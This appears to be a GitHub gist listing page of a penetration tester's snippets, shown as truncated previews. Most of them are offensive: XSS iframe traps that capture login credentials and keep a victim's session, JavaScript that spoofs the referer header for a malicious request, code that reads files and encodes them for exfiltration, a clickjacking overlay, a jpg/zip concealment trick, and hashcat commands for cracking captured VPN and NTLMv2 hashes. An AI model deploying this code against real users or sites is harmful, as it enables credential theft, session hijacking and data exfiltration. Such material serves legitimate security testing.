This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert('Click ok when you\'re ready to enter iframe trap'); | |
// Example Credential scraper and | |
// XSS iframe trap. Load from whatever | |
// page has the reflected/stored XSS vuln | |
// trap the user in an iframe of the app. | |
// Frame the login page, and copy out the | |
// username and password fields. | |
// @hoodoer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert('Click ok when you\'re ready to enter iframe trap'); | |
// Example XSS iframe trap. Load from whatever | |
// page has the reflected/stored XSS vuln | |
// trap the user in an iframe of the app. | |
// While they surf around, they stick in your | |
// iFrame, and you keep their session and your XSS | |
// payload running. | |
// @hoodoer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
There’s no GUI option to export an OVA (Open Virtual Appliance) format VM in VMware fusion, but there is a command-line method. Use the OVF tool. The following provides a command-line synopsis. | |
$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/ | |
$ ./ovftool –acceptAllEulas \ | |
> /Users/me/Documents/Virtual\ Machines.localized/TheVM.vmwarevm/TheVM.vmx \ | |
> ~/Desktop/TheVM.ova | |
Opening VMX source: […] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Save the current URL path to restore after making | |
// malicious request with faked referer header value | |
var savedPath = window.location.pathname; | |
var savedSearch = window.location.search; | |
// Change URL/History to control the referer header value | |
// Swap out "/this-is-my-fake-referer-value" to be what you need | |
window.history.replaceState(null, '', '/this-is-my-fake-referer-value'); | |
// Send malicious request with faked referer header value |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
fileXhr.open("GET", fileUri); | |
fileXhr.send(null); | |
console.log("Getting ready to get a file and exfil..."); | |
fileXhr.onreadystatechange = function() | |
{ | |
if (fileXhr.readyState == XMLHttpRequest.DONE) | |
{ | |
var responseData = encodeURIComponent(fileXhr.response); | |
var exfilData = btoa(responseData); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<style> | |
.overlay { | |
float: top; | |
position: absolute; | |
padding: 245px; | |
width: 250px; | |
clear: both; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cat nmapOutput.gnmap | grep -E -o '[0-9]{1,5}/open' | sort | uniq -c | sort -r | head -n 20 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
copy /b image.jpg+Exfiltration-test.zip New-Image.jpg. | |
Note above the '.' matters at the end, it's "New-Image.jpg." not "New-Image.jpg" | |
You can unzip the original zip file from the .jpg (on a linux box) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
IKE-PSK: | |
./hashcat -m 5300 vpn.psk ../PasswordLists/Top109Million-probable-v2.txt -a 0 -r rules/wtf.rule -O | |
Responder: | |
hashcat -m 5600 hashes\hash.txt password_list.txt -o cracked\cracked.txt -O -r rules/best64.rule | |
example: | |
./hashcat -m 5600 hashes.txt ../../VM\ Share/PasswordLists/rockyou.txt -o passwords.txt -O -r rules/best66.rule |
NewerOlder